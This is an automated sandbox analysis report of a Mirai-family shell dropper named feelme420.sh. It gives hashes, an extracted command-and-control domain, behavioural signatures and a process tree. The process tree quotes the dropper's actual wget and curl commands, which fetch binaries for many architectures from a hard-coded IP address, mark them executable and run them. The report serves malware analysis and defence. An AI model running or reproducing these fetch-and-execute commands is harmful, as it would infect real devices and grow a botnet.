Analysis
- max time kernel: 128s
- max time network: 152s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240611-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 19-12-2024 07:12
Static task: static1
Behavioral task: behavioral1
  Sample: feelme420.sh
  Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
  Sample: feelme420.sh
  Resource: debian9-armhf-20240729-en
Behavioral task: behavioral3
  Sample: feelme420.sh
  Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
  Sample: feelme420.sh
  Resource: debian9-mipsel-20240418-en
General
- Target: feelme420.sh
- Size: 3KB
- MD5: 22e9d65b991f00de3a52071664dc52f9
- SHA1: 2b6dd972572c4c72ecf43bb7b66eebe776cd0360
- SHA256: 7c31b6f7e29de978c261d41059788662d9d53faf08be61330e611eedcd46d33b
- SHA512: eefb50d98fc847673e4c38177789e26ee89ec7f027ec5ec92a842470638a84300f378cf10120afab26fe5a87de34c6616f33fc389be816b4763f0fea0eff18cb
Malware Config
Extracted
mirai
chernobyl.stressing.world
Signatures
-
Mirai family
-
Contacts a large (12800) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 16 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid   Process
1540  chmod
1612  chmod
1622  chmod
1482  chmod
1520  chmod
1562  chmod
1592  chmod
1632  chmod
1492  chmod
1510  chmod
1572  chmod
1582  chmod
1530  chmod
1550  chmod
1602  chmod
1642  chmod
-
Executes dropped EXE 16 IoCs
ioc             pid   Process
/tmp/f331m3420  1483  f331m3420
/tmp/f331m3420  1493  f331m3420
/tmp/f331m3420  1511  f331m3420
/tmp/f331m3420  1521  f331m3420
/tmp/f331m3420  1531  f331m3420
/tmp/f331m3420  1541  f331m3420
/tmp/f331m3420  1551  f331m3420
/tmp/f331m3420  1563  f331m3420
/tmp/f331m3420  1573  f331m3420
/tmp/f331m3420  1583  f331m3420
/tmp/f331m3420  1593  f331m3420
/tmp/f331m3420  1603  f331m3420
/tmp/f331m3420  1613  f331m3420
/tmp/f331m3420  1623  f331m3420
/tmp/f331m3420  1633  f331m3420
/tmp/f331m3420  1643  f331m3420
-
Modifies Watchdog functionality 1 TTPs 32 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description                   ioc                 Process
File opened for modification  /dev/watchdog       f331m3420
File opened for modification  /dev/watchdog       f331m3420
File opened for modification  /dev/misc/watchdog  f331m3420
File opened for modification  /dev/watchdog       f331m3420
File opened for modification  /dev/watchdog       f331m3420
File opened for modification  /dev/misc/watchdog  f331m3420
File opened for modification  /dev/misc/watchdog  f331m3420
File opened for modification  /dev/misc/watchdog  f331m3420
File opened for modification  /dev/misc/watchdog  f331m3420
File opened for modification  /dev/watchdog       f331m3420
File opened for modification  /dev/watchdog       f331m3420
File opened for modification  /dev/misc/watchdog  f331m3420
File opened for modification  /dev/watchdog       f331m3420
File opened for modification  /dev/misc/watchdog  f331m3420
File opened for modification  /dev/misc/watchdog  f331m3420
File opened for modification  /dev/watchdog       f331m3420
File opened for modification  /dev/watchdog       f331m3420
File opened for modification  /dev/misc/watchdog  f331m3420
File opened for modification  /dev/watchdog       f331m3420
File opened for modification  /dev/watchdog       f331m3420
File opened for modification  /dev/misc/watchdog  f331m3420
File opened for modification  /dev/misc/watchdog  f331m3420
File opened for modification  /dev/watchdog       f331m3420
File opened for modification  /dev/misc/watchdog  f331m3420
File opened for modification  /dev/watchdog       f331m3420
File opened for modification  /dev/watchdog       f331m3420
File opened for modification  /dev/misc/watchdog  f331m3420
File opened for modification  /dev/misc/watchdog  f331m3420
File opened for modification  /dev/watchdog       f331m3420
File opened for modification  /dev/misc/watchdog  f331m3420
File opened for modification  /dev/misc/watchdog  f331m3420
File opened for modification  /dev/watchdog       f331m3420
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates active TCP sockets 1 TTPs 15 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description              ioc            Process
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 32 IoCs
description                   ioc             Process
File opened for modification  /bin/watchdog   f331m3420
File opened for modification  /sbin/watchdog  f331m3420
File opened for modification  /sbin/watchdog  f331m3420
File opened for modification  /sbin/watchdog  f331m3420
File opened for modification  /sbin/watchdog  f331m3420
File opened for modification  /bin/watchdog   f331m3420
File opened for modification  /sbin/watchdog  f331m3420
File opened for modification  /sbin/watchdog  f331m3420
File opened for modification  /bin/watchdog   f331m3420
File opened for modification  /sbin/watchdog  f331m3420
File opened for modification  /bin/watchdog   f331m3420
File opened for modification  /sbin/watchdog  f331m3420
File opened for modification  /bin/watchdog   f331m3420
File opened for modification  /sbin/watchdog  f331m3420
File opened for modification  /sbin/watchdog  f331m3420
File opened for modification  /bin/watchdog   f331m3420
File opened for modification  /sbin/watchdog  f331m3420
File opened for modification  /sbin/watchdog  f331m3420
File opened for modification  /bin/watchdog   f331m3420
File opened for modification  /bin/watchdog   f331m3420
File opened for modification  /bin/watchdog   f331m3420
File opened for modification  /bin/watchdog   f331m3420
File opened for modification  /bin/watchdog   f331m3420
File opened for modification  /bin/watchdog   f331m3420
File opened for modification  /bin/watchdog   f331m3420
File opened for modification  /bin/watchdog   f331m3420
File opened for modification  /bin/watchdog   f331m3420
File opened for modification  /sbin/watchdog  f331m3420
File opened for modification  /bin/watchdog   f331m3420
File opened for modification  /sbin/watchdog  f331m3420
File opened for modification  /sbin/watchdog  f331m3420
File opened for modification  /sbin/watchdog  f331m3420
-
Reads process memory 1 TTPs 34 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
description              ioc             Process
File opened for reading  /proc/473/maps  f331m3420
File opened for reading  /proc/592/maps  f331m3420
File opened for reading  /proc/666/maps  f331m3420
File opened for reading  /proc/857/maps  f331m3420
File opened for reading  /proc/440/maps  f331m3420
File opened for reading  /proc/442/maps  f331m3420
File opened for reading  /proc/458/maps  f331m3420
File opened for reading  /proc/469/maps  f331m3420
File opened for reading  /proc/523/maps  f331m3420
File opened for reading  /proc/662/maps  f331m3420
File opened for reading  /proc/428/maps  f331m3420
File opened for reading  /proc/934/maps  f331m3420
File opened for reading  /proc/590/maps  f331m3420
File opened for reading  /proc/429/maps  f331m3420
File opened for reading  /proc/448/maps  f331m3420
File opened for reading  /proc/461/maps  f331m3420
File opened for reading  /proc/462/maps  f331m3420
File opened for reading  /proc/563/maps  f331m3420
File opened for reading  /proc/691/maps  f331m3420
File opened for reading  /proc/409/maps  f331m3420
File opened for reading  /proc/513/maps  f331m3420
File opened for reading  /proc/507/maps  f331m3420
File opened for reading  /proc/544/maps  f331m3420
File opened for reading  /proc/690/maps  f331m3420
File opened for reading  /proc/993/maps  f331m3420
File opened for reading  /proc/506/maps  f331m3420
File opened for reading  /proc/470/maps  f331m3420
File opened for reading  /proc/923/maps  f331m3420
File opened for reading  /proc/451/maps  f331m3420
File opened for reading  /proc/466/maps  f331m3420
File opened for reading  /proc/699/maps  f331m3420
File opened for reading  /proc/949/maps  f331m3420
File opened for reading  /proc/998/maps  f331m3420
File opened for reading  /proc/457/maps  f331m3420
-
Changes its process name 16 IoCs
description                                                      ioc  pid   Process
Changes the process name, possibly in an attempt to hide itself  a    1483  f331m3420
Changes the process name, possibly in an attempt to hide itself  a    1493  f331m3420
Changes the process name, possibly in an attempt to hide itself  a    1511  f331m3420
Changes the process name, possibly in an attempt to hide itself  a    1521  f331m3420
Changes the process name, possibly in an attempt to hide itself  a    1531  f331m3420
Changes the process name, possibly in an attempt to hide itself  a    1541  f331m3420
Changes the process name, possibly in an attempt to hide itself  a    1551  f331m3420
Changes the process name, possibly in an attempt to hide itself  a    1563  f331m3420
Changes the process name, possibly in an attempt to hide itself  a    1573  f331m3420
Changes the process name, possibly in an attempt to hide itself  a    1583  f331m3420
Changes the process name, possibly in an attempt to hide itself  a    1593  f331m3420
Changes the process name, possibly in an attempt to hide itself  a    1603  f331m3420
Changes the process name, possibly in an attempt to hide itself  a    1613  f331m3420
Changes the process name, possibly in an attempt to hide itself  a    1623  f331m3420
Changes the process name, possibly in an attempt to hide itself  a    1633  f331m3420
Changes the process name, possibly in an attempt to hide itself  a    1643  f331m3420
-
Reads system network configuration 1 TTPs 15 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description              ioc            Process
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
File opened for reading  /proc/net/tcp  f331m3420
-
description              ioc              Process
File opened for reading  /proc/1043/maps  f331m3420
File opened for reading  /proc/1049/maps  f331m3420
File opened for reading  /proc/1052/maps  f331m3420
File opened for reading  /proc/1059/maps  f331m3420
-
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid   Process
1486  wget
1490  curl
-
Writes file to tmp directory 31 IoCs
Malware often drops required files in the /tmp directory.
description                   ioc                    Process
File opened for modification  /tmp/feelme420.mips    wget
File opened for modification  /tmp/feelme420.ppc     curl
File opened for modification  /tmp/feelme420.x86_64  curl
File opened for modification  /tmp/feelme420.i686    wget
File opened for modification  /tmp/f331m3420         feelme420.sh
File opened for modification  /tmp/feelme420.mips    curl
File opened for modification  /tmp/feelme420.arm5    curl
File opened for modification  /tmp/feelme420.spc     wget
File opened for modification  /tmp/feelme420.arc     wget
File opened for modification  /tmp/feelme420.i486    wget
File opened for modification  /tmp/feelme420.x86     wget
File opened for modification  /tmp/feelme420.arm6    curl
File opened for modification  /tmp/feelme420.ppc     wget
File opened for modification  /tmp/feelme420.sh4     wget
File opened for modification  /tmp/feelme420.sh4     curl
File opened for modification  /tmp/feelme420.arm7    wget
File opened for modification  /tmp/feelme420.arm7    curl
File opened for modification  /tmp/feelme420.mpsl    wget
File opened for modification  /tmp/feelme420.arm     curl
File opened for modification  /tmp/feelme420.i486    curl
File opened for modification  /tmp/feelme420.x86     curl
File opened for modification  /tmp/feelme420.arm5    wget
File opened for modification  /tmp/feelme420.m68k    wget
File opened for modification  /tmp/feelme420.m68k    curl
File opened for modification  /tmp/feelme420.spc     curl
File opened for modification  /tmp/feelme420.i586    curl
File opened for modification  /tmp/feelme420.mpsl    curl
File opened for modification  /tmp/feelme420.arm6    wget
File opened for modification  /tmp/feelme420.arc     curl
File opened for modification  /tmp/feelme420.x86_64  wget
File opened for modification  /tmp/feelme420.i686    curl
Processes
-
/tmp/feelme420.sh
command: /tmp/feelme420.sh
- Writes file to tmp directory
PID:1468
-
  /usr/bin/wget
  command: wget http://94.23.167.188/F331M3/feelme420.x86
  - Writes file to tmp directory
  PID:1469
  -
  /usr/bin/curl
  command: curl -O http://94.23.167.188/F331M3/feelme420.x86
  - Writes file to tmp directory
  PID:1478
  -
  /bin/cat
  command: cat feelme420.x86
  PID:1481
  -
  /bin/chmod
  command: chmod +x config-err-d1U8bY f331m3420 feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
  - File and Directory Permissions Modification
  PID:1482
  -
  /tmp/f331m3420
  command: ./f331m3420 feelme420.exploit
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Changes its process name
  PID:1483
  -
  /usr/bin/wget
  command: wget http://94.23.167.188/F331M3/feelme420.mips
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1486
  -
  /usr/bin/curl
  command: curl -O http://94.23.167.188/F331M3/feelme420.mips
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1490
  -
  /bin/chmod
  command: chmod +x config-err-d1U8bY f331m3420 feelme420.mips feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
  - File and Directory Permissions Modification
  PID:1492
  -
  /tmp/f331m3420
  command: ./f331m3420 feelme420.exploit
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1493
  -
  /usr/bin/wget
  command: wget http://94.23.167.188/F331M3/feelme420.mpsl
  - Writes file to tmp directory
  PID:1504
  -
  /usr/bin/curl
  command: curl -O http://94.23.167.188/F331M3/feelme420.mpsl
  - Writes file to tmp directory
  PID:1508
  -
  /bin/chmod
  command: chmod +x config-err-d1U8bY f331m3420 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
  - File and Directory Permissions Modification
  PID:1510
  -
  /tmp/f331m3420
  command: ./f331m3420 feelme420.exploit
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1511
  -
  /usr/bin/wget
  command: wget http://94.23.167.188/F331M3/feelme420.arm
  PID:1514
  -
  /usr/bin/curl
  command: curl -O http://94.23.167.188/F331M3/feelme420.arm
  - Writes file to tmp directory
  PID:1518
  -
  /bin/chmod
  command: chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
  - File and Directory Permissions Modification
  PID:1520
  -
  /tmp/f331m3420
  command: ./f331m3420 feelme420.exploit
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1521
  -
  /usr/bin/wget
  command: wget http://94.23.167.188/F331M3/feelme420.arm5
  - Writes file to tmp directory
  PID:1524
  -
  /usr/bin/curl
  command: curl -O http://94.23.167.188/F331M3/feelme420.arm5
  - Writes file to tmp directory
  PID:1528
  -
  /bin/chmod
  command: chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
  - File and Directory Permissions Modification
  PID:1530
  -
  /tmp/f331m3420
  command: ./f331m3420 feelme420.exploit
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1531
  -
  /usr/bin/wget
  command: wget http://94.23.167.188/F331M3/feelme420.arm6
  - Writes file to tmp directory
  PID:1534
  -
  /usr/bin/curl
  command: curl -O http://94.23.167.188/F331M3/feelme420.arm6
  - Writes file to tmp directory
  PID:1538
  -
  /bin/chmod
  command: chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
  - File and Directory Permissions Modification
  PID:1540
  -
  /tmp/f331m3420
  command: ./f331m3420 feelme420.exploit
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1541
  -
  /usr/bin/wget
  command: wget http://94.23.167.188/F331M3/feelme420.arm7
  - Writes file to tmp directory
  PID:1544
  -
  /usr/bin/curl
  command: curl -O http://94.23.167.188/F331M3/feelme420.arm7
  - Writes file to tmp directory
  PID:1548
  -
  /bin/chmod
  command: chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
  - File and Directory Permissions Modification
  PID:1550
  -
  /tmp/f331m3420
  command: ./f331m3420 feelme420.exploit
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1551
  -
  /usr/bin/wget
  command: wget http://94.23.167.188/F331M3/feelme420.ppc
  - Writes file to tmp directory
  PID:1556
  -
  /usr/bin/curl
  command: curl -O http://94.23.167.188/F331M3/feelme420.ppc
  - Writes file to tmp directory
  PID:1560
  -
  /bin/chmod
  command: chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
  - File and Directory Permissions Modification
  PID:1562
  -
  /tmp/f331m3420
  command: ./f331m3420 feelme420.exploit
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1563
  -
  /usr/bin/wget
  command: wget http://94.23.167.188/F331M3/feelme420.m68k
  - Writes file to tmp directory
  PID:1566
  -
  /usr/bin/curl
  command: curl -O http://94.23.167.188/F331M3/feelme420.m68k
  - Writes file to tmp directory
  PID:1570
  -
  /bin/chmod
  command: chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
  - File and Directory Permissions Modification
  PID:1572
  -
  /tmp/f331m3420
  command: ./f331m3420 feelme420.exploit
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1573
  -
  /usr/bin/wget
  command: wget http://94.23.167.188/F331M3/feelme420.sh4
  - Writes file to tmp directory
  PID:1576
  -
  /usr/bin/curl
  command: curl -O http://94.23.167.188/F331M3/feelme420.sh4
  - Writes file to tmp directory
  PID:1580
  -
  /bin/chmod
  command: chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
  - File and Directory Permissions Modification
  PID:1582
  -
  /tmp/f331m3420
  command: ./f331m3420 feelme420.exploit
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1583
  -
  /usr/bin/wget
  command: wget http://94.23.167.188/F331M3/feelme420.spc
  - Writes file to tmp directory
  PID:1586
  -
  /usr/bin/curl
  command: curl -O http://94.23.167.188/F331M3/feelme420.spc
  - Writes file to tmp directory
  PID:1590
  -
  /bin/chmod
  command: chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
  - File and Directory Permissions Modification
  PID:1592
  -
  /tmp/f331m3420
  command: ./f331m3420 feelme420.exploit
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1593
  -
  /usr/bin/wget
  command: wget http://94.23.167.188/F331M3/feelme420.arc
  - Writes file to tmp directory
  PID:1596
  -
  /usr/bin/curl
  command: curl -O http://94.23.167.188/F331M3/feelme420.arc
  - Writes file to tmp directory
  PID:1600
  -
  /bin/chmod
  command: chmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
  - File and Directory Permissions Modification
  PID:1602
  -
  /tmp/f331m3420
  command: ./f331m3420 feelme420.exploit
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1603
  -
  /usr/bin/wget
  command: wget http://94.23.167.188/F331M3/feelme420.x86_64
  - Writes file to tmp directory
  PID:1606
  -
  /usr/bin/curl
  command: curl -O http://94.23.167.188/F331M3/feelme420.x86_64
  - Writes file to tmp directory
  PID:1610
  -
  /bin/chmod
  command: chmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
  - File and Directory Permissions Modification
  PID:1612
  -
  /tmp/f331m3420
  command: ./f331m3420 feelme420.exploit
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1613
  -
  /usr/bin/wget
  command: wget http://94.23.167.188/F331M3/feelme420.i686
  - Writes file to tmp directory
  PID:1616
  -
  /usr/bin/curl
  command: curl -O http://94.23.167.188/F331M3/feelme420.i686
  - Writes file to tmp directory
  PID:1620
  -
  /bin/chmod
  command: chmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
  - File and Directory Permissions Modification
  PID:1622
  -
  /tmp/f331m3420
  command: ./f331m3420 feelme420.exploit
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1623
  -
  /usr/bin/wget
  command: wget http://94.23.167.188/F331M3/feelme420.i486
  - Writes file to tmp directory
  PID:1626
  -
  /usr/bin/curl
  command: curl -O http://94.23.167.188/F331M3/feelme420.i486
  - Writes file to tmp directory
  PID:1630
  -
  /bin/chmod
  command: chmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
  - File and Directory Permissions Modification
  PID:1632
  -
  /tmp/f331m3420
  command: ./f331m3420 feelme420.exploit
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
